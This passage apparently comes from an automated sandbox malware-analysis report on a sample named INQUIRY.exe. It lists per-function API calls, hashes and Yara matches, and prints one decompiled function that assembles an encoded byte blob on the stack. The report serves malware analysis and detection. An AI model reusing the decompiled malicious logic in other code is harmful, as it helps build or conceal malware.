                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Strings
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 0048FA2A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                        • String ID: C:\Users\user\Desktop\INQUIRY.exe
                                                                        • API String ID: 1620000358-3835629383
                                                                        • Opcode ID: 842b178210db866b2f2be6f39dfcaba4cbfa6a6665f28ad10fb330eeed32ab13
                                                                        • Instruction ID: a4111e1aaaff6485f92680991e2c3f5f6b8aae9cde56256721aaef646297ebb2
                                                                        • Opcode Fuzzy Hash: 842b178210db866b2f2be6f39dfcaba4cbfa6a6665f28ad10fb330eeed32ab13
                                                                        • Instruction Fuzzy Hash: 4F01843551020A9ECF15FF68C848DAF3768EB04318F008972F85AC7211EA34DA65CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F95F, Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,00000004,?), ref: 0048F981
                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0048F9DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 525f77252a9c518c4f5824c71e447e6dc0dca3bb1da0b0ab50a0aa2bf5964490
                                                                        • Instruction ID: 8a8519ee04cf0fdfe50e7ce0800386e52267a6ba67a2fe26ef23db32edde32f4
                                                                        • Opcode Fuzzy Hash: 525f77252a9c518c4f5824c71e447e6dc0dca3bb1da0b0ab50a0aa2bf5964490
                                                                        • Instruction Fuzzy Hash: AB118FB2900205AFDB219F58C880BBA77B8EF45714F04457AE945D7291E334ED44DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004900B9, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 004900E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: d9979fa05ce1dc1c859586d38e44ca7ca340289d5517fa8832bf41a33512b922
                                                                        • Instruction ID: dfb8620630a0cdac6e1c48b5e8b9d9f74ae82449725838133c88a63dc2e8afa5
                                                                        • Opcode Fuzzy Hash: d9979fa05ce1dc1c859586d38e44ca7ca340289d5517fa8832bf41a33512b922
                                                                        • Instruction Fuzzy Hash: C5D01222001926661A157266FC069DF678C9D13374364443BFA05D55429F5C9A9683FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048A12C, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0048A141
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: 3a4bd739c8ee00cad3feebe758d6a37913103926495479478cd9efa198607957
                                                                        • Instruction ID: 565e0fd7b9501178c149667a35d805a4ff27f116542911f88b1184eabe90f11b
                                                                        • Opcode Fuzzy Hash: 3a4bd739c8ee00cad3feebe758d6a37913103926495479478cd9efa198607957
                                                                        • Instruction Fuzzy Hash: A6D05E765543459AEB109F74AC09B663BDC93943A5F108437B90DC6250F575C9908608
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048AF47, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __encode_pointer.LIBCMT ref: 0048AF49
                                                                          • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEE7
                                                                          • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000005,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEFE
                                                                          • Part of subcall function 0048AED5: RtlEncodePointer.NTDLL(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AF3C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Value$EncodePointer__encode_pointer
                                                                        • String ID:
                                                                        • API String ID: 2585649348-0
                                                                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                        • Instruction ID: d00ef9800d0f3221da160c25f2b57490603d93154157223f0d3dd03d3d12f148
                                                                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048FF82, Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 5ae71b66ce67940abd36b3045bebaf34cf4d3d32628ce2254455733b7bd3bfd3
                                                                        • Instruction ID: 92d5f1821dd3087d4e7dc77925b8887368f6326e4a95ea35ca1d9da69d18d743
                                                                        • Opcode Fuzzy Hash: 5ae71b66ce67940abd36b3045bebaf34cf4d3d32628ce2254455733b7bd3bfd3
                                                                        • Instruction Fuzzy Hash: 1721C672A00304EBCF20AF99DD81B5ABBF4BF04708F04483AE645D7202D678E954CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048FED9, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 082b20c7a03fdab3cc33d574c10bb021c57e165413355a68de40628e0976087d
                                                                        • Instruction ID: 2e8f6f7748eaef1a81948672398a6272f665005e92e72ce12bf6c12643d2e041
                                                                        • Opcode Fuzzy Hash: 082b20c7a03fdab3cc33d574c10bb021c57e165413355a68de40628e0976087d
                                                                        • Instruction Fuzzy Hash: 6C119072A00704ABCB10AF99CC85B9EB7F4AF05304F04487AE745D7212D774E959CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004900F0, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32 ref: 004900FA
                                                                          • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                          • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                          • Part of subcall function 0048F46C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                          • Part of subcall function 0048F46C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
                                                                        • String ID:
                                                                        • API String ID: 2900862000-0
                                                                        • Opcode ID: 996353df0a45330c46878d6c1a60e48001f5cfe9bcf41fef40e6b50f0b10096f
                                                                        • Instruction ID: 840203a668d8769d645263ec739f117059fb683fe1172dab8d11aa23342a09c4
                                                                        • Opcode Fuzzy Hash: 996353df0a45330c46878d6c1a60e48001f5cfe9bcf41fef40e6b50f0b10096f
                                                                        • Instruction Fuzzy Hash: B2F0223A800104EFCB109B85ED46E5EBBB8EB90769F20047BE444A7221C3766D41CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0048BBB5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0048DB4E
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0048DB63
                                                                        • UnhandledExceptionFilter.KERNEL32(FI), ref: 0048DB6E
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0048DB8A
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0048DB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID: FI
                                                                        • API String ID: 2579439406-1293059371
                                                                        • Opcode ID: 807031ba3dfa138bf8dca9b0c4f3dc67835273f350ae91acf0c420aaa0d53d6e
                                                                        • Instruction ID: b8e9b097ad48f464bcad59a8399b0ed038067b003d2aa283789311110aa9c9a0
                                                                        • Opcode Fuzzy Hash: 807031ba3dfa138bf8dca9b0c4f3dc67835273f350ae91acf0c420aaa0d53d6e
                                                                        • Instruction Fuzzy Hash: FC21D0B88512499FC710EF95F949A583BF4FBAA304F1150BBE41883774E7745A828F5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048A746, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0048A74B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 403e1ff0d8d71728c0d54f19a939813f7ec8e54641915ba13776238b1e81135c
                                                                        • Instruction ID: 81433e7e343146cc976c64969640f8e966be3140acd685938dc30b2b020c0812
                                                                        • Opcode Fuzzy Hash: 403e1ff0d8d71728c0d54f19a939813f7ec8e54641915ba13776238b1e81135c
                                                                        • Instruction Fuzzy Hash: 8E9002646611428A960037B05D1955965A05A587027515873A115D4464DAA98050662A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F412, Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
                                                                        • Instruction ID: 66c3af05f4c833101bcd62443286c7dc37dad603ef252332458b9e5ff3faedc0
                                                                        • Opcode Fuzzy Hash: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
                                                                        • Instruction Fuzzy Hash: 38D0A93091528CEFDB01CF48D102B8EBBB8AB0070CF600089D0005B342C2B9AE02DB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F4D0, Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
                                                                        • Instruction ID: 1128efe6a1c562d64635b53d85e06f8595b5e71423cf0e78613a8e238405d936
                                                                        • Opcode Fuzzy Hash: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
                                                                        • Instruction Fuzzy Hash: 74D0127090528CEFDB11CB44D205B4EBBF8AB00B5CF118098E00597681C3B9AF48D754
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B1E6, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E0040B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E0041105D(_a4 + 4);
				_push(_t178);
				L0044B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E0041105D(_a4);
				_push(_t180);
				L0044B581();
				if(_t180 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E0041105D(_a4);
				_push(_t182);
				L0044B581();
				if(_t182 == 0) {
					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E0041105D(_a4);
				_push(_t184);
				L0044B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L0044B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L0044B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E0041118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L0044B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

























































































































































                                                                        0x0040b1f8
                                                                        0x0040b1fa
                                                                        0x0040b1ff
                                                                        0x0040b205
                                                                        0x0040b208
                                                                        0x0040b20d
                                                                        0x0040b20e
                                                                        0x0040b215
                                                                        0x0040b21a
                                                                        0x0040b22b
                                                                        0x0040b22b
                                                                        0x0040b233
                                                                        0x0040b238
                                                                        0x0040b23d
                                                                        0x0040b23e
                                                                        0x0040b247
                                                                        0x0040b258
                                                                        0x0040b258
                                                                        0x0040b260
                                                                        0x0040b265
                                                                        0x0040b26a
                                                                        0x0040b26b
                                                                        0x0040b274
                                                                        0x0040b285
                                                                        0x0040b285
                                                                        0x0040b28d
                                                                        0x0040b292
                                                                        0x0040b297
                                                                        0x0040b298
                                                                        0x0040b2a1
                                                                        0x0040b744
                                                                        0x0040b744
                                                                        0x0040b2a7
                                                                        0x0040b2a7
                                                                        0x0040b2aa
                                                                        0x0040b2ad
                                                                        0x0040b2b0
                                                                        0x0040b2b7
                                                                        0x0040b2be
                                                                        0x0040b2c5
                                                                        0x0040b2cc
                                                                        0x0040b2d3
                                                                        0x0040b2da
                                                                        0x0040b2e1
                                                                        0x0040b2e8
                                                                        0x0040b2ef
                                                                        0x0040b2f6
                                                                        0x0040b2fd
                                                                        0x0040b304
                                                                        0x0040b30b
                                                                        0x0040b312
                                                                        0x0040b319
                                                                        0x0040b320
                                                                        0x0040b327
                                                                        0x0040b32e
                                                                        0x0040b335
                                                                        0x0040b33c
                                                                        0x0040b343
                                                                        0x0040b34a
                                                                        0x0040b351
                                                                        0x0040b358
                                                                        0x0040b35f
                                                                        0x0040b366
                                                                        0x0040b36d
                                                                        0x0040b374
                                                                        0x0040b37b
                                                                        0x0040b382
                                                                        0x0040b389
                                                                        0x0040b390
                                                                        0x0040b397
                                                                        0x0040b39e
                                                                        0x0040b3a5
                                                                        0x0040b3ac
                                                                        0x0040b3b3
                                                                        0x0040b3ba
                                                                        0x0040b3c1
                                                                        0x0040b3c8
                                                                        0x0040b3cf
                                                                        0x0040b3d6
                                                                        0x0040b3dd
                                                                        0x0040b3e4
                                                                        0x0040b3eb
                                                                        0x0040b3f2
                                                                        0x0040b3f9
                                                                        0x0040b400
                                                                        0x0040b407
                                                                        0x0040b40d
                                                                        0x0040b414
                                                                        0x0040b41b
                                                                        0x0040b422
                                                                        0x0040b429
                                                                        0x0040b430
                                                                        0x0040b437
                                                                        0x0040b43e
                                                                        0x0040b445
                                                                        0x0040b44c
                                                                        0x0040b453
                                                                        0x0040b45a
                                                                        0x0040b461
                                                                        0x0040b468
                                                                        0x0040b46f
                                                                        0x0040b476
                                                                        0x0040b47d
                                                                        0x0040b484
                                                                        0x0040b48b
                                                                        0x0040b492
                                                                        0x0040b499
                                                                        0x0040b4a0
                                                                        0x0040b4a7
                                                                        0x0040b4ae
                                                                        0x0040b4b5
                                                                        0x0040b4bc
                                                                        0x0040b4c3
                                                                        0x0040b4ca
                                                                        0x0040b4d1
                                                                        0x0040b4d6
                                                                        0x0040b4dd
                                                                        0x0040b4de
                                                                        0x0040b4e5
                                                                        0x0040b4ec
                                                                        0x0040b4f3
                                                                        0x0040b4fa
                                                                        0x0040b501
                                                                        0x0040b508
                                                                        0x0040b50f
                                                                        0x0040b516
                                                                        0x0040b51d
                                                                        0x0040b524
                                                                        0x0040b52b
                                                                        0x0040b532
                                                                        0x0040b539
                                                                        0x0040b540
                                                                        0x0040b547
                                                                        0x0040b54e
                                                                        0x0040b555
                                                                        0x0040b55c
                                                                        0x0040b563
                                                                        0x0040b56a
                                                                        0x0040b571
                                                                        0x0040b578
                                                                        0x0040b57f
                                                                        0x0040b586
                                                                        0x0040b58d
                                                                        0x0040b594
                                                                        0x0040b59b
                                                                        0x0040b5a2
                                                                        0x0040b5a9
                                                                        0x0040b5b0
                                                                        0x0040b5b7
                                                                        0x0040b5be
                                                                        0x0040b5c5
                                                                        0x0040b5cc
                                                                        0x0040b5d3
                                                                        0x0040b5da
                                                                        0x0040b5e1
                                                                        0x0040b5e8
                                                                        0x0040b5ef
                                                                        0x0040b5f6
                                                                        0x0040b5fd
                                                                        0x0040b604
                                                                        0x0040b60b
                                                                        0x0040b612
                                                                        0x0040b619
                                                                        0x0040b620
                                                                        0x0040b627
                                                                        0x0040b62e
                                                                        0x0040b635
                                                                        0x0040b63c
                                                                        0x0040b64c
                                                                        0x0040b64d
                                                                        0x0040b64e
                                                                        0x0040b651
                                                                        0x0040b652
                                                                        0x0040b653
                                                                        0x0040b65b
                                                                        0x0040b65c
                                                                        0x0040b66e
                                                                        0x0040b66f
                                                                        0x0040b671
                                                                        0x0040b67c
                                                                        0x0040b682
                                                                        0x0040b68f
                                                                        0x0040b696
                                                                        0x0040b6bb
                                                                        0x0040b704
                                                                        0x0040b704
                                                                        0x0040b70c
                                                                        0x0040b720
                                                                        0x0040b72b
                                                                        0x0040b72b
                                                                        0x0040b731
                                                                        0x0040b735
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040b73a
                                                                        0x0040b6bd
                                                                        0x0040b6c5
                                                                        0x0040b6cc
                                                                        0x0040b6cd
                                                                        0x0040b6db
                                                                        0x0040b6f4
                                                                        0x0040b6fb
                                                                        0x0040b702
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040b702

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp Download File
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 0-140969752
                                                                        • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction ID: b3b03687bd6bacd840c90b17c05aedc23d9fa5d3dc97117df5ba02558f5b3d9c
                                                                        • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction Fuzzy Hash: 1EF1F0209087E9C9DB32C7788C097CEBE645B27324F0443DAD1E97A2D2D7B54BC58B66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004A04CE, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 0-140969752
                                                                        • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction ID: 06c4c55b5f7c0cabfc9a08f70ed99313b441ce6f7a1b330f367ec5fe98c38343
                                                                        • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction Fuzzy Hash: D8F1F0209087E98DDB32C7788C097CEBE655B23324F0843D9D5E87A2D2D7B54B85CB66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048B03C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00492660,0000000C,0048B177,00000000,00000000,?,?,0048A6BF,0048910E), ref: 0048B04E
                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 0048B059
